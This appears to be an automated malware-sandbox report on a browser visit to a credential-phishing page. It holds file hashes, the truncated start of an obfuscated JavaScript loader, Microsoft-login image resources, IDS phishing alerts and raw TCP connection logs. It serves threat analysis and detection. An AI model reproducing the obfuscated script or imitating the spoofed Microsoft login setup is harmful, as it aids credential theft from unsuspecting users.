                                                                                                                                                                                                                                            Preview:function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3ed08f, _0x56c8b3) {. const _0x2019c0 = _0x1fae,. _0x43cc63 = _0x3ed08f();. while (!![]) {. try {. const _0x262285 = parseInt(_0x2019c0(0x121)) / 0x1 + -parseInt(_0x2019c0(0x170)) / 0x2 + -parseInt(_0x2019c0(0x14b)) / 0x3 + -parseInt(_0x2019c0(0x14d)) / 0x4 + -parseInt(_0x2019c0(0x14c)) / 0x5 + -parseInt(_0x2019c0(0x118)) / 0x6 + parseInt(_0x2019c0(0x171)) / 0x7;. if (_0x262285 === _0x56c8b3) break;. else _0x43cc63['push'](_0x43cc63['shift']());. } catch (_0x3070ea) { _0x43cc63['push'](_0x43cc63['shift']()); }. }.}(_0x59eb, 0x27508), window['addEventListener']('load', function() {. const _0x1706f4 = _0x1fae;. document[_0x1706f4(0x166)][_0x1706f4(0x102)](_0x1706f4(0x151
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):23427
                                                                                                                                                                                                                                            Entropy (8bit):5.112735417225198
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:1HHLO7eS0F4bBY/fn6jZcy9/cGK1q8CarY64Cb+dOy:1HHCLYXfl1q8CarY64Cb+dl
                                                                                                                                                                                                                                            MD5:BA0537E9574725096AF97C27D7E54F76
                                                                                                                                                                                                                                            SHA1:BD46B47D74D344F435B5805114559D45979762D5
                                                                                                                                                                                                                                            SHA-256:4A7611BC677873A0F87FE21727BC3A2A43F57A5DED3B10CE33A0F371A2E6030F
                                                                                                                                                                                                                                            SHA-512:FC43F1A6B95E1CE005A8EFCDB0D38DF8CC12189BEAC18099FD97C278D254D5DA4C24556BD06515D9D6CA495DDB630A052AEFC0BB73D6ED15DEBC0FB1E8E208E7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://www.w3schools.com/w3css/4/w3.css
                                                                                                                                                                                                                                            Preview:./* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes */.html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}./* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */.html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}.article,aside,details,figcaption,figure,footer,header,main,menu,nav,section{display:block}summary{display:list-item}.audio,canvas,progress,video{display:inline-block}progress{vertical-align:baseline}.audio:not([controls]){display:none;height:0}[hidden],template{display:none}.a{background-color:transparent}a:active,a:hover{outline-width:0}.abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}.b,strong{font-weight:bolder}dfn{font-style:italic}mark{background:#ff0;color:#000}.small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}.sub{bottom:-0.25em}sup{top:-0.5em}figure{margin:1em 40px}img{border-style:none}.code,kbd,p
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):199
                                                                                                                                                                                                                                            Entropy (8bit):6.766983163126765
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:XtkhhsKHWpSiKPjPOeNWo6Rs7J1TxODwpV:X8hsKHDTPyeNSRs7vV0aV
                                                                                                                                                                                                                                            MD5:21B761F2B1FD37F587D7222023B09276
                                                                                                                                                                                                                                            SHA1:F7A416C8907424F9A9644753E3A93D4D63AE640E
                                                                                                                                                                                                                                            SHA-256:72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
                                                                                                                                                                                                                                            SHA-512:77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg
                                                                                                                                                                                                                                            Preview:..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):2407
                                                                                                                                                                                                                                            Entropy (8bit):7.900400471609788
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
                                                                                                                                                                                                                                            MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                                                                                                                                                                                                                                            SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                                                                                                                                                                                                                                            SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                                                                                                                                                                                                                                            SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg
                                                                                                                                                                                                                                            Preview:...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx|............|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):673
                                                                                                                                                                                                                                            Entropy (8bit):7.6596900876595075
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                                                                                                                                                                                            MD5:0E176276362B94279A4492511BFCBD98
                                                                                                                                                                                                                                            SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                                                                                                                                                                                            SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                                                                                                                                                                                            SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):276
                                                                                                                                                                                                                                            Entropy (8bit):7.316609873335077
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
                                                                                                                                                                                                                                            MD5:4E3510919D29D18EEB6E3E8B2687D2F5
                                                                                                                                                                                                                                            SHA1:31522A9EC576A462C3F1FFA65C010D4EB77E9A85
                                                                                                                                                                                                                                            SHA-256:1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
                                                                                                                                                                                                                                            SHA-512:DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg
                                                                                                                                                                                                                                            Preview:...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....*e.......J).*8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):1435
                                                                                                                                                                                                                                            Entropy (8bit):7.8613342322590265
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                                                                                                                                                                                            MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                                                                                                                                                                            SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                                                                                                                                                                            SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                                                                                                                                                                            SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                                                                                                                                                                                                            Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                                                                                                                                                                                            No static file info
                                                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                            2024-11-14T13:01:41.114666+01002057333ET PHISHING MAMBA Credential Phish Landing Page 2024-11-081192.168.2.449745192.254.232.133443TCP
                                                                                                                                                                                                                                            2024-11-14T13:01:41.894533+01002056643ET PHISHING Javascript Browser Fingerprinting POST Request2192.168.2.449746192.254.232.133443TCP
                                                                                                                                                                                                                                            2024-11-14T13:01:43.173206+01002056316ET PHISHING Generic Credential Phish Landing Page (jsnom.js)1192.168.2.449747192.254.232.133443TCP
                                                                                                                                                                                                                                            2024-11-14T13:01:44.800183+01002056316ET PHISHING Generic Credential Phish Landing Page (jsnom.js)1192.168.2.449750192.254.232.133443TCP
                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:32.389177084 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:36.903331995 CET49740443192.168.2.4104.18.68.40
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:36.903397083 CET44349740104.18.68.40192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:36.903465986 CET49740443192.168.2.4104.18.68.40
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:36.904160976 CET49740443192.168.2.4104.18.68.40
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:36.904191971 CET44349740104.18.68.40192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:37.195173025 CET49741443192.168.2.4142.250.186.164
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:37.195219994 CET44349741142.250.186.164192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:37.195278883 CET49741443192.168.2.4142.250.186.164
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:37.195460081 CET49741443192.168.2.4142.250.186.164
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:37.195477962 CET44349741142.250.186.164192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:37.519336939 CET44349740104.18.68.40192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:37.519583941 CET49740443192.168.2.4104.18.68.40
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:37.519613981 CET44349740104.18.68.40192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:37.521102905 CET44349740104.18.68.40192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:37.521171093 CET49740443192.168.2.4104.18.68.40
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:37.930421114 CET49740443192.168.2.4104.18.68.40
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:37.930701971 CET49740443192.168.2.4104.18.68.40
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:37.930712938 CET44349740104.18.68.40192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:37.930809975 CET44349740104.18.68.40192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:37.974103928 CET49740443192.168.2.4104.18.68.40
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:37.974138021 CET44349740104.18.68.40192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.028806925 CET49740443192.168.2.4104.18.68.40
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.044153929 CET44349741142.250.186.164192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.045770884 CET49741443192.168.2.4142.250.186.164
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.045790911 CET44349741142.250.186.164192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.047219038 CET44349741142.250.186.164192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.047282934 CET49741443192.168.2.4142.250.186.164
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.049001932 CET49741443192.168.2.4142.250.186.164
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.049094915 CET44349741142.250.186.164192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.091348886 CET49741443192.168.2.4142.250.186.164
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.091366053 CET44349741142.250.186.164192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.126630068 CET44349740104.18.68.40192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.126868010 CET44349740104.18.68.40192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.127057076 CET49740443192.168.2.4104.18.68.40
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.129257917 CET49740443192.168.2.4104.18.68.40
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.129281998 CET44349740104.18.68.40192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.137311935 CET49741443192.168.2.4142.250.186.164
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.172000885 CET49742443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.172045946 CET44349742184.28.90.27192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.172385931 CET49742443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.174277067 CET49742443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.174288988 CET44349742184.28.90.27192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.177838087 CET49743443192.168.2.4185.221.216.128
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.177905083 CET44349743185.221.216.128192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.178425074 CET49743443192.168.2.4185.221.216.128
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.182287931 CET49743443192.168.2.4185.221.216.128
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:38.182324886 CET44349743185.221.216.128192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.003484964 CET44349743185.221.216.128192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.006683111 CET49743443192.168.2.4185.221.216.128
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.006709099 CET44349743185.221.216.128192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.007729053 CET44349743185.221.216.128192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.007939100 CET49743443192.168.2.4185.221.216.128
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.023025990 CET44349742184.28.90.27192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.023209095 CET49742443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.026274920 CET49742443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.026283026 CET44349742184.28.90.27192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.026683092 CET44349742184.28.90.27192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.066461086 CET49742443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.107325077 CET44349742184.28.90.27192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.166553974 CET49743443192.168.2.4185.221.216.128
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.166695118 CET49743443192.168.2.4185.221.216.128
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.166719913 CET44349743185.221.216.128192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.166759968 CET44349743185.221.216.128192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.208322048 CET49743443192.168.2.4185.221.216.128
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.208340883 CET44349743185.221.216.128192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.238951921 CET44349730173.222.162.32192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.239046097 CET49730443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.253386021 CET49743443192.168.2.4185.221.216.128
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.307708979 CET44349742184.28.90.27192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.307862043 CET44349742184.28.90.27192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.307918072 CET49742443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.343694925 CET49742443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.343767881 CET44349742184.28.90.27192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.343784094 CET49742443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.343794107 CET44349742184.28.90.27192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.396336079 CET44349743185.221.216.128192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.396429062 CET44349743185.221.216.128192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.396483898 CET49743443192.168.2.4185.221.216.128
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.435864925 CET49743443192.168.2.4185.221.216.128
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.435905933 CET44349743185.221.216.128192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.466018915 CET49744443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.466105938 CET44349744184.28.90.27192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.466187954 CET49744443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.469026089 CET49744443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.469048023 CET44349744184.28.90.27192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.749268055 CET49745443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.749305010 CET44349745192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.749366045 CET49745443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.749855995 CET49745443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:39.749866962 CET44349745192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:40.309375048 CET44349744184.28.90.27192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:40.310292959 CET49744443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:40.310726881 CET49744443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:40.310755014 CET44349744184.28.90.27192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:40.311091900 CET44349744184.28.90.27192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:40.312083960 CET49744443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:40.355338097 CET44349744184.28.90.27192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:40.442734003 CET44349745192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:40.442974091 CET49745443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:40.442992926 CET44349745192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:40.444672108 CET44349745192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:40.444772005 CET49745443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:40.553327084 CET44349744184.28.90.27192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:40.553581953 CET44349744184.28.90.27192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:40.554171085 CET49744443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:40.554171085 CET49744443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:40.554171085 CET49744443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:40.635353088 CET49745443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:40.635552883 CET44349745192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:40.638266087 CET49745443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:40.638284922 CET44349745192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:40.690623045 CET49745443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:40.863748074 CET49744443192.168.2.4184.28.90.27
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:40.863822937 CET44349744184.28.90.27192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.114712000 CET44349745192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.114773035 CET44349745192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.114917040 CET44349745192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.114969015 CET44349745192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.114979029 CET49745443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.114979029 CET49745443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.115272045 CET49745443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.115937948 CET49745443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.115962982 CET44349745192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.212707043 CET49746443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.212749004 CET44349746192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.212816000 CET49746443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.213278055 CET49746443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.213294983 CET44349746192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.213673115 CET49747443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.213702917 CET44349747192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.213752985 CET49747443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.213958025 CET49747443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.213963985 CET44349747192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.891467094 CET44349746192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.891732931 CET49746443192.168.2.4192.254.232.133
